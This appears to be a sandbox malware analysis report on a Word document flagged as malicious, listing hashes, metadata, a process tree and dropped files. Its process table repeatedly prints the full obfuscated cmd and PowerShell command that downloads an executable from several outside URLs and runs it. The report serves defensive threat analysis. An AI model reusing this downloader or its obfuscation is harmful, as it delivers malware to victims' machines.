Field | Value |
---|---|
File name | FA038071_36.doc |
Full analysis | https://app.any.run/tasks/92dd7378-e239-48e4-89a6-a843922fe022 |
Verdict | Malicious activity |
Analysis date | January 17, 2019, 16:31:05 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 16 11:40:00 2019, Last Saved Time/Date: Wed Jan 16 11:40:00 2019, Number of Pages: 1, Number of Words: 13, Number of Characters: 80, Security: 0 |
MD5 | 8CF1ECA3CE29415BBBDC9402F0081193 |
SHA1 | F28F29965C0735D240FC281842DE779EFD52CA7E |
SHA256 | F2D9DD503F6F96EBE5E0CD82B1F035E3321A2A8EFD1EDDEB126386DC73071312 |
SSDEEP | 768:KVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFB3MB4zy2Gf37mYCp4DXUyZpOGanwrQ:Kocn1kp59gxBK85fBU4oXAwohX+a95 |
Extension | Type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title | - |
Subject | - |
Author | - |
Keywords | - |
Comments | - |
Template | Normal.dotm |
LastModifiedBy | - |
RevisionNumber | 1 |
Software | Microsoft Office Word |
TotalEditTime | - |
CreateDate | 2019:01:16 11:40:00 |
ModifyDate | 2019:01:16 11:40:00 |
Pages | 1 |
Words | 13 |
Characters | 80 |
Security | None |
CodePage | Windows Latin 1 (Western European) |
Company | - |
Lines | 1 |
Paragraphs | 1 |
CharCountWithSpaces | 92 |
AppVersion | 16 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | - |
HeadingPairs | |
CompObjUserTypeLen | 32 |
CompObjUserType | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA038071_36.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
924 | "C:\Windows\system32\cmd.exe" /c %pROgRaMdATA:~0,1%%PrOgrAMDATa:~9,2% /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 255; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2704 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 255; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2980 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3388 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2288 | "C:\Windows\system32\cmd.exe" /c CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 255; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2544 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 255; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2800 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3752 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9224.tmp.cvr | — | — | — |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A8341ED.wmf | — | — | — |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3491783.wmf | — | — | — |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC2ADA9C.wmf | wmf | FC787222CE5B4CC4CAD31B79C3C2348E | 8B5397118F6F9D1330C73A0521108988C59B8AB9BCF5EE338E33D31C5BBE2F40 |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | A78D8F9A2177366796F0334082A6178D | 5AE7E2762BC23A5EEE925C924F34C589BDA230A52A6F1FA5E392BD8DC0AE1B8D |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9513C70A.wmf | wmf | C1CEE3313A9A055AB269356C788D2F4B | 3F992E7FE3B9E39827132318CFDEFC810946B81F80CA09B24E494C5B47A56F3F |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$038071_36.doc | pgc | 231D4B930E7331F02060D41DD9ED947F | 6077F2986D73D260B5383AB4F17B86545F3505A5A6628B2D3BC7AB0FB915CDEE |
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 57EF33A4E40DD22385BB3E357F26E8BE | 3D5C1C7A266AA54341ACA11732CD12090B84B00FF95A8A980817DA4F21B95AD6 |